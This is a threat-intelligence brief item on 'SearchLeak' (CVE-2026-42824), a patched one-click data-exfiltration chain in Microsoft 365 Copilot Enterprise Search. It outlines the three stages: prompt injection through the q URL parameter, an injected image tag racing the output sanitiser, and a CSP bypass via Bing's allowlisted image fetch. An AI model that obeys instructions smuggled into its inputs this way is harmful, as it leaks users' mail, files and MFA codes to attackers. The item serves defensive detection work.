Varonis "SearchLeak" (CVE-2026-42824): one-click M365 Copilot data exfiltration, now patched
From CTI Daily Brief — 2026-06-16 · published 2026-06-16 · view item permalink →
Varonis Threat Labs disclosed SearchLeak, a three-stage chain in Microsoft 365 Copilot Enterprise Search that Microsoft patched server-side as CVE-2026-42824 (command-injection / information-disclosure, NVD CVSS 6.5) (Varonis, 2026-06-15; Microsoft MSRC). Stage 1: the q URL parameter is passed to Copilot as an executable instruction rather than a sanitised query (parameter-to-prompt injection). Stage 2: an injected <img> tag fires during a streaming-render race before the output sanitiser runs. Stage 3: the exfiltration request is relayed through Bing's server-side image-search fetch — *.bing.com is allowlisted in Copilot's CSP — bypassing the browser CSP and carrying mailbox content, calendar entries, SharePoint/OneDrive files and emailed MFA/OTP codes to an attacker domain, all from a single click on a genuine microsoft.com link (The Hacker News, 2026-06-15). No customer action is required for patched tenants and no in-the-wild exploitation was observed. Mapped to T1566.002 and T1071.001.
Why it matters to us: M365 Copilot Enterprise is in active Swiss-federal and EU public-sector rollouts. The vulnerability class — prompt injection via URL parameter, streaming-render race, and SSRF-relay CSP bypass — will recur in other AI-augmented enterprise apps; build CASB/DLP detection for Copilot search URLs carrying HTML-encoded payloads in the q parameter and for Copilot sessions fetching to non-Microsoft domains.